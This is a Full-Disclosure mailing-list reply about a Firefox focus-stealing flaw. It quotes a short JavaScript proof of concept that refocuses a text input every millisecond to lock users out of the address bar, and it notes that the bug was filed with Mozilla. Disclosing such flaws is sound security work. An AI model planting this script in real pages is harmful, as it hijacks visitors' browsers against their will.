Re: [Full-disclosure] Firefox focus stealing vulnerability (possibly other browsers)

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 



pdp (architect) wrote:
try this

<input id="foo" type="text"/>
<script>
setInterval(function () {
document.getElementById('foo').focus();
},1);
</script>

:) the address bar is disabled...

Funny. Filed as bug 370094 <https://bugzilla.mozilla.org/show_bug.cgi?id=370094>

[Index of Archives]     [Linux Security]     [Netfilter]     [PHP]     [Yosemite News]     [Linux Kernel]

  Powered by Linux